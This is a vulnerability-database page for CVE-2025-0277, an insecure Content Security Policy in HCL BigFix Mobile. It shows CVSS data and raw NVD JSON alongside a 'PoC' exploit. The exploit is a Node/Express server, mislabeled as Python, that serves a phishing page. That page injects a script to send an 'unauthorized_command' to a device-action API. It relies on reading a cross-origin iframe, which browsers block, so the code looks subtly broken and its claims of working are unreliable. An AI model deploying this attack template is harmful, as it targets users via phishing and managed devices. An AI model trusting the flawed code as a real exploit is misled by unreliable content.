Security Vulnerability Report
中文
CVE-2025-0277 CVSS 6.5 MEDIUM

CVE-2025-0277

Published: 2025-10-16 09:15:33
Last Modified: 2025-10-21 18:15:34
Source: [email protected]

Description

HCL BigFix Mobile 3.3 and earlier are vulnerable to certain insecure directives within the Content Security Policy (CSP). An attacker could trick users into performing actions by not properly restricting the sources of scripts and other content.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:* - VULNERABLE
HCL BigFix Mobile <= 3.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-0277 PoC - HCL BigFix Mobile CSP Unsafe Directives Exploitation // This PoC demonstrates how an attacker can exploit insecure CSP directives // in HCL BigFix Mobile 3.3 and earlier versions. // Step 1: Host a malicious HTML page that exploits the CSP weakness // The vulnerable application uses unsafe CSP directives such as 'unsafe-inline' // or wildcard sources, allowing inline scripts to execute. const express = require('express'); const app = express(); app.get('/exploit', (req, res) => { // Set a Content-Type that might be accepted by the vulnerable app res.set('Content-Type', 'text/html'); res.send(` <!DOCTYPE html> <html> <head> <title>Malicious Page</title> <!-- Exploit: Due to insecure CSP in BigFix Mobile, inline scripts are allowed to execute --> </head> <body> <h1>Loading BigFix Mobile content...</h1> <iframe src="https://target-bigfix-mobile-server" width="100%" height="600px" style="border:none;"></iframe> <script> // Step 2: Exploit unsafe-inline or unsafe-eval CSP directive // This inline script can execute because CSP is misconfigured // Attempt to perform actions on behalf of the user const iframe = document.querySelector('iframe'); iframe.onload = function() { try { // Access the BigFix Mobile application context const doc = iframe.contentDocument; // Exploit: Execute arbitrary actions within the app // due to insufficient CSP source restrictions if (doc) { // Inject malicious script into the app context const script = doc.createElement('script'); script.textContent = ` // Simulate unauthorized action execution fetch('/api/mobile/devices/action', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({ action: 'unauthorized_command', target: 'managed_device' }) }); `; doc.head.appendChild(script); console.log('[+] CSP bypass successful - action executed'); } } catch(e) { console.log('[-] Exploit failed: ' + e.message); } }; </script> </body> </html> `); }); // Step 3: Serve the exploit app.listen(8080, () => { console.log('CVE-2025-0277 PoC server running on http://localhost:8080/exploit'); console.log('Send this URL to the victim via phishing or social engineering'); });

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-0277", "sourceIdentifier": "[email protected]", "published": "2025-10-16T09:15:32.983", "lastModified": "2025-10-21T18:15:34.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL BigFix Mobile 3.3 and earlier are vulnerable to certain insecure directives within the Content Security Policy (CSP). An attacker could trick users into performing actions by not properly restricting the sources of scripts and other content."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}, {"lang": "en", "value": "CWE-80"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_mobile:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.3", "matchCriteriaId": "97CEC651-375F-4FE8-B947-0A3D89FF0267"}, {"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_modern_client_management:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.4", "matchCriteriaId": "251EA75C-E4D9-4A13-B13D-02DFF9E6161D"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0124513", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.